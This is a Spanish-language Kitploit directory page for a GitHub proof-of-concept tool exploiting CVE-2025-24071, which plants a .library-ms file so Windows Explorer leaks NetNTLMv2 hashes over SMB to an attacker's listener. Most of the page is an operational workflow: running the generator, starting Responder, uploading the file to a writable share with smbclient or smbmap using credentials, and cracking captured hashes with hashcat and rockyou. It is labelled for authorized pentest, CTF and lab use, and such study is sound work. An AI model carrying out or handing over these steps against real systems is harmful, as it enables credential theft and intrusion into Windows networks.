Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PoC-CVE-2025-24071 — PoC en Python para CVE-2025-24071 que crea un archivo .library-ms para forzar a Windows Explorer a filtrar hashes NetNTLMv2 a través de SMB para su captura y cracking. | Kitploit
Herramientas/GitHubGitHub/daemon-404/poc-cve-2025-24071
Ataques de ContraseñasAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesCTFPruebas de PenetraciónRed TeamingLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
daemon-404/poc-cve-2025-24071

PoC-CVE-2025-24071

PoC en Python para CVE-2025-24071 que crea un archivo .library-ms para forzar a Windows Explorer a filtrar hashes NetNTLMv2 a través de SMB para su captura y cracking.

Ver Repositorio
hace 13h 56mAún no revisado

❀ coerce-library

CVE-2025-24071 — coerción NTLM mediante .library-ms (método SMB / TAR)

Theme: Rosé Pine Python: 3.9+ CVE: 2025-24071

Protocol: SMB Capture: NetNTLMv2 Use: Lab / CTF


❀ Qué hace

Solicita tu IP de ataque y un nombre de archivo, escribe un .library-ms apuntando a \\<IP>\share, y lo empaqueta en exploit.tar. Cuando el Explorador examina la carpeta donde acaba el .library-ms suelto, resuelve automáticamente esa ruta UNC y filtra el NTLMv2 de la cuenta hacia tu listener — sin necesidad de clic.

⚠️ El .library-ms suelto es lo que se dispara — no el .tar. Un .tar en el recurso compartido es inerte; el Explorador no analiza archivos tar. Debes colocar el .library-ms en sí mismo en el recurso compartido como archivo suelto. Cómo lo hagas depende de la herramienta (abajo).


❀ Ejecútalo

root@kitploit:~
uv run coerce_library.py      # or: python3 coerce_library.py
root@kitploit:~
Attack IP [10.10.14.197]:
File name [documents]:
[+] documents.library-ms  ->  \\10.10.14.197\share
[+] packed into exploit.tar

❀ Luego

1) Escucha

root@kitploit:~
sudo responder -I tun0

2) Coloca el .library-ms en un recurso compartido con permisos de escritura

smbclient — sube el .tar, extráelo en el lado del servidor con tar x (deja el .library-ms suelto junto a él):

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'put exploit.tar; tar x exploit.tar'

smbmap — no tiene paso de extracción, así que sube el .library-ms suelto directamente (subir el .tar aquí no hace nada — no puede descomprimirlo):

root@kitploit:~
smbmap -H <TARGET> -d <DOMAIN> -u <USER> -p <PASS> --upload exploit.library-ms 'IT/exploit.library-ms'

Confirma que quedó suelto en el recurso compartido:

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'ls' | grep library

3) Crackea el NTLMv2 capturado

root@kitploit:~
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

☧ solo para pruebas de penetración autorizadas / CTF / laboratorio ☧

Descargar herramienta